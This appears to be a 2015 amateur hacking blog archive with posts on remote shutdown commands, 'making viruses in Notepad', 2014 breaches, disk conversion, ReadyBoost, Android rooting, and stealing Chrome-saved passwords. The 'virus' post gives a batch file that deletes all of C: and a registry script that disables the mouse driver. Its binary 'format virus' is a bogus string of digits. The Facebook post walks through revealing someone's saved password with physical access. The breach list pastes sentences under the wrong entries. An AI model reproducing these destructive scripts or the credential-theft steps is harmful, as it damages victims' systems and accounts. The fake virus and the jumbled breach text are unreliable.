This is the official blog for next generation hacker's.....

Monday, 23 February 2015

HACK AND DESTROY PC

Shutdown Your Computer or a Remote PC via Command Prompt


Most of us shutdown our computers using the power button given in the Start menu. Some of us use the physical power button on our machines. Very few people actually use other means of shutting down a computer and even less is the number of people who use the command prompt to shutdown a computer.

A reason for this is that most of us don't know that the command prompt can be used to not only shutdown, restart or log off our computer instantly but also to shutdown a remote computer provided you have administrative access. It can also be used to hibernate a computer and give a comment containing the reason for shutdown. This post will show you how to do all this.

Required
A computer running Windows (XP, Vista, 7, 8 or 8.1) with the command prompt working perfectly, i.e. not disabled by a virus.


Initial Steps 

1) Press Windows Key + R.
2) Enter CMD and press Enter.

This will start the command prompt. Follow the instructions below depending on what you want to do.

Shutdown Local Machine (Your Computer)
Type "shutdown -s" without the quotes in the command prompt and press Enter. Shutdown is the command being executed and the switch -s tells the computer to shutdown.

Restart your Local Computer
Type "shutdown -r" in the command prompt and press Enter. In this case, the command switch -r is telling the computer to restart after shutdown.

Log Off the Current User
Type "shutdown -l" in the command prompt and press Enter. The -l command switch tells the computer to log off.

Shutdown a Remote Computer
Type "shutdown -s -m \\name of the computer" in the command prompt and press Enter. Replace \\name of the computer with the actual name of the remote computer you are trying to shutdown. As mentioned earlier, you must have administrative access to the computer you are trying to shutdown. To know if you have administrative access, press Windows key + R and then type the name of the computer and press Enter.

Note: If you don't remember the name of the remote computer, you can look for it by opening a list of all the computers you are connected to by executing "net view" in command prompt.

If you can connect to the computer, you will be asked to login with your username and password. Upon entering them, a window will display the list of all the directories available to you. This should help you know whether you can or cannot shutdown the remote computer.

Hibernate a Local Computer
Type in "Rundll32.exe Powrprof.dll,SetSuspendState" without the quotes and press Enter. Your computer should hibernate, if it does not, then you must enable hibernation to do this.

Shutdown your or a remote computer after a specific time
Type "shutdown -s -t 60" to shutdown your computer after 60 seconds. Upon executing this, a countdown timer displaying a warning message will be shown. This command uses the -t command switch followed by a variable (which is 60 in this case) which represents the number of seconds after which the computer will shutdown.

Display a Message containing the reason for shutdown
Type shutdown -s  -t 500 -c "I am tired. I don't want to work anymore." (with the quotes) in the Command Prompt and press Enter. The -c switch is used in the code to give the reason for shutting down and what is followed in quotes will be displayed in the dialog box as the reason. This can be used to display all sorts of funny messages. One example :-

Skynet has become self aware. John Connor did not stop me. You can not use your PC anymore.

Stop a System Shutdown

Type "shutdown -a" and press Enter. This will stop the system from shutting down if the countdown to shut down has not reached 0.

MAKE VIRUS USING NOTEPAD

                 HOW TO MAKE VIRUS USING NOTEPAD

>>Virus that format C: Drive:

 1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.







  

>>>Virus that Disable Mouse:

  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as  virus.bat
  • Done you just created your virus.

>>>Virus that create binary virus to format HARDDIsK:

   1. Copy the below codes into Notepad.

01001011000111110010010101010101010000011111100000
   2. Save the file as Format.exe
   3. You just created virus to format Hard Drive. Enjoy !!!

 


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Thursday, 19 February 2015

Best hacking in 2014

The 10 best hacking in 2014
By Aniruth ravichander

Chances are your personal information was hacked this year—even if you didn’t realize it.2014 was a year of unprecedented security breaches, with attacks striking some of the world’s biggest corporations and most famous celebrities. We’ve reached the tipping point of cyberwar with North Korea over the Sony hacks spurred by the Seth Rogen/James Franco romp The Interview, and vulnerabilities in the very infrastructure of the Web have been exploited to potentially devastating effect.
When it comes to cybersecurity, the situation doesn’t appear to be improving at all.
We’ve gathered 10 of the biggest hacks of the year. All of them were extremely high-profile and should serve as one last reminder to change your damn passwords already.
10) Heartbleed (April 2014)catchy name, killer logo, and ubiquitous reports made Heartbleed one of the scariest hacks of 2014. Deemed  “catastrophic,” the vulnerability affected the OpenSSL cryptographic software library used to encrypt Web traffic. It allows attackers to grab any and all manner of sensitive data from seemingly secure servers without leaving a trace.
“On the scale of 1 to 10, this is an 11,” cryptographer Bruce Schneier wrote.
Created during a late-night programming session that yielded a massive error, Heartbleed threw the world of network security into a maelstrom. The impact has been enormous—here’s a long but incomplete list of affected services—including many of the biggest websites and most widely used software in the world.
“Some might argue that [Heartbleed] is the worst vulnerability found (at least in terms of its potential impact) since commercial traffic began to flow on the Internet,” Forbes cybersecurity columnist Joseph Steinberg explained.
Heartbleed could continue to plague the Internet for years to come.
9) Shellshock (September 2014)It took months for the Internet’s collective pulse to calm down after Heartbleed, just enough time for Shellshock to enter the world’s lexicon.
Heartbleed’s heir apparent, it allowed hackers to gain access to vulnerable systems on Mac OS X and Linux computers—exactly the type of machine that run the backend of countless major websites and services.
It took only a few hours before hackers were taking over machines to create enormous botnets of slave computers that launched millions of attacks on, among other targets, the U.S. Department of Defense.
8) CurrentCMobile payments are a literal a gold mine; that’s why Walmart, Target, and Best Buy launched a product called CurrentC in a sharp counter to the creation of Apple Pay.
The problem came just a few days later, when users were told “that unauthorized third parties obtained the e-mail addresses of some of you.”
It was a poor start that earned CurrentC critical headlines the world over.
In fact, things might not have been quite as bad as the early reports suggested. Hackers reportedly only obtained customers’ email addresses, and the attack was far from the death knell for the service.
Millions are currently using CurrentC every week, despite the fact that the first hack hit at just the wrong time. That shows the power and determination of the product’s titan backers to overcome whatever obstacles it may encounter.
7) CyberVor (August 2014)Either this was an enormous hack pulled off by Russian criminals or a big public relations hack by Hold Security.
Earlier this year, the New York Times reported that a Russian gang called CyberVor (“Vor” means thief in Russian) had amassed 1.2 billion username and password combinations, plus 500 million email addresses, making this “the largest known collection of stolen Internet credentials.”
The news went viral and the world wanted more details. Too bad, too, because there are no details. Hold Security, the firm that reported the theft to the Times, said it had nondisclosure agreements that wouldn’t allow the company to name the victims of the attacks. The newspaper reported that an independent security expert verified the authenticity of the credentials, however, and the report was published.
Here’s another way of looking at it. When security firms like Hold Security break news about major thefts, they get massive advertising from the reporters that cover the incident, and criticism tends to be limited because details are unavailable.
“[T]his is a pretty direct link between a panic and a pay-out for a security firm,” Forbes’ Kashmir Hill wrote, reporting that shortly after the news went up, Hold Security offered a $120 service to see if you were infected.
Meanwhile, the Times wrote (in the story’s 11th paragraph) that the stolen credentials hadn’t been sold and were only being used to spam social networks like Twitter. That doesn’t sound quite like what all the grandiose headlines promised.
6) Home Depot (September 2014)Home Depot fell victim to a data breach resulting in the theft of 56 million credit and debit cards earlier this year. That’s notable on its own, but the hack only gets bigger once you examine the context.
Last year, Target was victim to a hack that led to the theft of 40 million credit and debit cards. That was a wake up call to the world’s biggest retailers, including Home Depot, who reinforced security on its point-of-sale equipment.
However, Home Depot cybersecurity sources told reporters that the company had been ignoring their concerns for at least six years. The company reportedly responded to internal complaints and criticisms with the same sad refrain: “We sell hammers.”
Several cybersecurity experts resigned from the company as a result.
By the time Target jolted them awake, it was too late. Criminals were inside their systems, stealing information from millions of customers for months if not years. The fixes the company rolled out to respond to the Target hack were finished a month after their own hack was revealed.
5) JP Morgan Chase (August 2014)The data breach that allowed hackers inside JPMorgan Chase is one of the biggest in history. Over 83 million households and small businesses—about 65 percent of all U.S. households—were affected, including previous account holders.
Either this was an enormous hack pulled off by Russian criminals or a big public relations hack by Hold Security.
But for all its vastness, the data stolen doesn’t appear to have been all that sensitive. Passwords, account numbers, user IDs, birthdays, and Social Security numbers appeared to be safe, according to Chase, and no fraud has been reported since the attack occurred.
That’s good news—for now at least. An enormous haul like this isn’t going to go without use, and all types of fraud can be enabled here including phishing and cold-calling—two criminal arts that have been as strong as ever this holiday season.
4) Sony (November 2014)The hack of the moment also has big implications for the future.
While hackers who targeted Home Depot and JPMorgan took more classical routes—using the breach to steal customer data—the Sony hackers are aiming squarely at the company itself.
The drama opened in November when the attackers demanded the company pay a ransom to keep a big cache of stolen data private.  The Sony executives didn’t pay up, so a torrent of sensitive information from the company rushed into public view.
Unreleased films hit the Internet, financial information about executives was revealed, secret marketing information and political plans hit the presses. Just when it looked like things couldn’t get any worse, Sony shelved The Interview, the comedy that spurred the altercation—in light of escalating threats. While the FBI has officially deemed North Korea responsible for the hacks, President Obama has said he believe it was a mistake to establish a pattern of intimidation.
3) Regin (November 2014)Over the last few years, you’ve likely heard of countless cyberattacks against the West being linked to China. It’s gotten to the point where almost any attack is presumed to have originated in Beijing until proven otherwise—or at least that’s how the press reports it.
Here we have something different.
The United States and United Kingdom are reportedly responsible for creating and deploying Regin, a complex bit of malware behind an attack on the Belgian Internet company Belgacom’s computer systems and email servers.
Regin, which steals data and disguises itself as legitimate software, has also been found on European Union computers, where it reportedly stole data for months with direction from America’s National Security Agency. It’s been called a “top-tier espionage tool” and “among the most sophisticated ever discovered by researchers.”
2) South Korea (August 2014)Over 70 percent of the adult population of South Korea was affected by a massive data breach that hit 27 million people and 220 million private records. There has never been a larger swath of a single country affected in one fell swoop of an attack.
The hack of the moment also has big implications for the future.
Sixteen hackers were arrested in August for the scheme, which earned them a seemingly small $390,000 after they targeted Korea’s strong online gaming culture. Registration pages for gaming and gambling sites, as well as online ringtone downloads and movie ticket stores, were among the attackers’ targets.
The actual origin of the attacks is unknown. South Korean police say it came from China and was resold to “mortgage fraudsters and illegal gambling advertisers.” Damages are estimated to exceed $2 million.
1) Celebgate (August 2014)This wasn’t about the money or the demands. Instead, it was about the targets.
Hundreds of images, including nude photos, from many of the world’s biggest female celebrities were posted online at the end of August as a result of a hack of Apple’s iCloud services that allowed attackers to steal passwords, usernames, and other data in a “very targeted” breach.
Millions of people looked at the stolen images, with some even sending bitcoins as payment to the hacker, sparking a wide debate about the ethics of posting or even looking at nude photographs stolen from a private citizen. When sites like Reddit eventually took steps to stop the spread of the photos—after they reaped the rewards of many millions of pageviews and a big pile of cash from its users—cries of censorship spread the debate over stolen photos even wider.
This year saw cybersecurity reach new heights in terms of public awareness. Names like Heartbleed and hacks like Sony’s have made more headlines than ever before. But it was Celebgate—also known as “The Fappening”—that topped them all.

Months later, it still does.
ISL1Q6X
Screengrab via Google Trends

Thursday, 22 January 2015

how to convert gpt disk into mbr disk

How to Convert GPT Disk to MBR Disk


information   Information
A disk is a separate physical hard drive. This will show you how to convert a GPT (GUID - Globally Unique Identifer) disk to a MBR (Master Boot Record) disk in Windows Disk Manager or in a command prompt. By default Windows uses MBR disks.

While all Windows can boot from a MBR disk, you can only boot from a GPT disk if you have a operating system (see below) that supports GPT and your motherboard has a EFI BIOS and is enabled. Windows 7 and Vista does support booting from a GPT disk.

You can still have a separate GPT disk as a data disk if your operating system (see below) supports reading a GPT disk, even if your system disk that Windows is installed on is still a MBR disk.

Note   Note
Differences Between MBR and GPT Disks:
  • MBR disks are supported (readable) by all Windows operating systems.
    • GPT disks are only supported (readable) by Windows server 2003 SP1 +, XP 64-bit, Vista, Windows 7, Windows Server 2008.
  • MBR disks use the standard BIOS partition table.
    • GPT disks use extensible firmware interface (EFI).
  • MBR disks supports up to 2TB per single partition.
    • GPT disks supports up to 256TB per single partition in Windows.
  • MBR disks supports up to 4 Primary partitions or 3 Primary partitions and 1 Extended partition with up to 128 logical volumes in the extended partition.
    • GPT disks supports up to 128 Primary partitions.
  • Removable disks are MBR disks by default.
    • Removable disks cannot be converted into a GPT disk.
warning   Warning
  • You must be a administrator to do this in Windows.
  • Before you convert a disk, close any programs that are running on or from that disk.
  • Before you convert a disk, be sure to backup anything that you do not want to lose on that disk. Converting the disk requires that all partitions and volumes are deleted on the disk first.
  • If you disable the Disk Defragmenter service, then you will get the error below when you try to do anything in Disk Management. If you get this error, then make sure that the Disk Defragmenter service is enabled and set to only Manual.
Name:  Error.jpg
Views: 230965
Size:  29.2 KB


EXAMPLE: MBR disk vs GPT disk in Disk Management
-mbr_disk_example.jpg

-gpt_disk_example.jpg



OPTION ONE
Through Disk Management
1. Open the Control Panel (icons view), and click on the Administrative Tools icon, then close the Control Panel window.

2. Click on Computer Management in Administrative Tools, then close the Administrative Tools window.

3. If prompted by UAC, click on Yes.

4. In the left pane under Storage, click on Disk Management. (See screenshot below)
-step1.jpg
5. In the disk (ex: Disk 1) that you want to convert to a MBR disk, right click on each partition and volume on the disk and click on Delete Volume until the whole disk is unallocated space. (See screenshot above)

6. Right click on the disk (ex: Disk 1) that you want to convert to a MBR disk, and click on Convert to MBR Disk if available. (See screenshot below)
-step2.jpg
7. You can confirm that the disk is a MBR disk if you right click on the disk and it has Convert to GPT Disk instead now. (See screenshot below)
-step3.jpg
8. You can now create partitions on the now MBR disk if you like.

9. When done, close Disk Management.





OPTION TWO
Through a Command Prompt
1. Open an elevated command prompt, and go to step 3 below.

OR

2. Open a command prompt at boot, and go to step 3 below.
-command_mbr.jpg
3. In the command prompt, type diskpart and press enter. (See screenshot above)

4. Type list disk and press enter.
NOTE: Make note of the disk number (ex: Disk 1) that you want to convert to a MBR disk.

5. Type select disk # and press enter.
NOTE: Substitute # with the actual disk number that you want to convert to a MBR disk. For example, select disk 1.

6. Do step 7 or 8 below for what you would like to do.

7. To Use the "Clean" Command to make Disk Unallocated
NOTE: This is the easiest method. It will wipe the disk clean all at once leaving it as unallocated space afterwards.
A) In the command prompt, type clean and press enter.

B) Go to step 9 below.
8. To Manually make Disk Unallocated
NOTE: This method has you manually delete each volume on the disk before converting the disk to MBR.
A) Type detail disk and press enter. If the disk does not have any volumes listed, then you can go to step 8E below.
NOTE: This will give you a list of all the volume numbers on the selected disk number that you will need to delete in steps 8B and 8C below.

B) Type select volume # and press enter.
NOTE: Substitute # with a volume number listed in step 8A. For example, select volume 3.

C) Type delete volume and press enter.

D) Repeat steps 8B and 8C for each volume # listed in step 8A until you have deleted all volume #'s.

E) When finished, type select disk # and press enter.
NOTE: You would use the same one from step 5 above. For example, select disk 1.

F) Go to step 9 below.
9. Type convert mbr and press enter.

10. Close the command prompt.

11. You can now create partitions on the now MBR disk if you like.
NOTE: Restart the computer if you did step 2 instead.
That's it,
by....
aniruth ravichander

Wednesday, 21 January 2015

HOW TO INCREASE RAM IN WINDOWS 7 USING PENDRIVE

HI GUYS TODAY I'M GONE A SHOW YOU HOW TO INCREASE RAM IN WINDOWS 7 USING PENDRIVE .....

NOW LET'S SEE HOW TO DO THIS.......

NOTE: THIS TRICK IS SUPPORTED FOR ALL WINDOWS SYSTEM'S

Connect a USB stick to a Windows computer – even on Windows 8 – and Windows will ask if you want to speed up your system using ReadyBoost. But what exactly is ReadyBoost, and will it actually speed up your computer?
ReadyBoost was introduced in Windows Vista, where it was a heavily promoted feature. Unfortunately, ReadyBoost isn’t a silver bullet that will make your computer faster, although it may be useful in some limited circumstances.

How ReadyBoost Works

ReadyBoost works in conjunction with SuperFetch. SuperFetch, also introduced in Windows Vista, monitors the programs you use on your computer and automatically loads their application files and libraries into your computer’s memory (RAM) ahead of time. When you launch the application, it will start faster — your computer reads its files from memory, which is faster, instead of from disk, which is slower. Empty RAM doesn’t do any good, so using it as a cache for frequently accessed applications can increase your computer’s responsiveness.
SuperFetch normally uses your computer’s memory – it caches these files in your RAM. However, SuperFetch can also work with a USB stick – that’s ReadyBoost in action. When you connect a USB drive to your computer and enable ReadyBoost, Windows will store SuperFetch data on your USB drive, freeing up system memory. It’s faster to read various small files from your USB stick than it is to read them from your hard drive, so this can theoretically improve your system’s performance.
image

Why ReadyBoost Probably Isn’t Useful For You

So far, so good – but there’s a catch: USB storage is slower than RAM. It’s better to store SuperFetch data in your computer’s RAM than on a USB stick. Therefore, ReadyBoost only helps if your computer doesn’t have enough RAM. If you have more than enough RAM, ReadyBoost won’t really help.
ReadyBoost is ideal for computers with a small amount of RAM. When Windows Vista was released, Anandtech benchmarked ReadyBoost, and the results of their benchmark were informative. In combination with 512 MB of RAM (a very small amount of RAM – new computers today generally contain several gigabytes), ReadyBoost offered some improved performance. However, adding additional RAM always improved performance much more than using ReadyBoost.
if your computer is stressed for RAM, you’re better off adding more RAM instead of using ReadyBoost.
ram-in-computer
IMAGE : ANIRUTH RAVICHANDER

When ReadyBoost Is Worth Using

With that said, ReadyBoost may still be useful if your current computer has a small amount of RAM (512 MB, or perhaps even 1 GB) and you don’t want to add additional RAM for some reason – perhaps you just have a spare USB stick lying around.
If you opt to use ReadyBoost, bear in mind that the speed of your USB drive also determines how much improved performance you’ll get. If you have an old, slow USB stick, you may not see a noticeable increase in performance, even with a small amount of RAM. Windows won’t allow ReadyBoost to be used on particularly slow USB flash drives, but some drives are faster than others.
usb-drive-in-computer
IMAGE : ANIRUTH RAVICHANDER


In summary, ReadyBoost probably won’t improve your computer’s performance much. If you have a very small amount of RAM (512 MB or so) and a very fast USB drive, you may see some increase in performance – but it isn’t even guaranteed in this situation.

Friday, 16 January 2015

HOW TO HACK FB EASILY 100% WORKING

HI GUYS TODAY I'M BACK WITH NEW FB HACKING TRICK IT'S CALLED AS 

"IE HACKING"

NOW LET'S SEE HOW TO DO THIS.....

 After a lot of readers who keep repeatedly posting on facebook hacking, here is a method which will do the needful. Last time we discussed how to do this by sessionhijacking/cookie stealing. This time we will not go that further. Simple coding analysis will do that. However we need to have physical access to the machine..

So here-s how-

-) Make sure the person uses google chrome.. it's needed
-) If the user prefers save password, he's gone!

Step One: Open Google Chrome. Go to the website that you want to the steal that certain password from. (ex. YouTube, Facebook, G mail)

Step Two: Go to the login interface. If they use Google Chromes program to save passwords, then your in luck.

Step Three: Highlight the password.

Step Four: Right click > Inspect Element

Step Five: This is where things get tricky. A box with a bunch of codes should popup below. The line you're looking for should be highlighted. Look for the following code:" <input type=''password'' "

Step Six: Right click > Edit Attribute

Step Seven: rename 'password' to 'text'.

Step Eight: Copy down the password, you are done!

 
THAT'S ALL ENJOY......

Thursday, 15 January 2015

HOW TO ROOT ANY ANDRIOD DEVICE EASILY....

HI GUYS ....

TODAY I'M GONE SEE YOU HOW TO ROOT ANY ANDRIOD DEVICE" S EASILY WITHOUT THE HELP OF  COMPUTER'S

SO LET'S START 

NOTE : ONCE YOUR ANDRIOD MOBILE ROOTED YOUR MOBILE LOSE GARUNDY  SO PLEASE CAREFUL.....

REQUIREMENT'S:

1.ANY ANDROID DEVICE(SAMSUNG,SONY,LG,XOLO,,,,ETC)

2.TOWEL ROOT APPLICATION (DOWNLOAD LINK WAS GIVEN BELOW)

3.ROOT CHECKER APPLICATION (IT'S NOT COMPULSORY)

4.SUPER SU (DOWNLOAD LINK GIVEN BELOW)

HOW TO DO IT:

1.DOWNLOAD  TOWELROOT APPLICATION

2.INSTALL TOWEL ROOT

3.IN HERE YOU WILL CLICK  "MAKE IT RUN" BUTTON



4.NOW YOUR MOBILE WAS ROOTED SUCCESS FULLY.....

5.DO YOU WANT TO VERIFY YOUR DEVICES ARE ROOTED SUCCESSFULLY  YOU CAN DOWNLOAD AND INSTALL ROOT CHECKER APPLICATION(DOWNLOAD LINK WAS GIVEN BELOW)

6.AT FINALLY YOU MUST INSTALL SUPER SU APPLICATION (DOWNLOAD LINK GIVEN BELOW )

DOWNLOAD LINKS :

1.TOWEL ROOT      :     DOWNLOAD
   
2.ROOT CHECKER  :    DOWNLOAD

3.SUPER SU                :    DOWNLOAD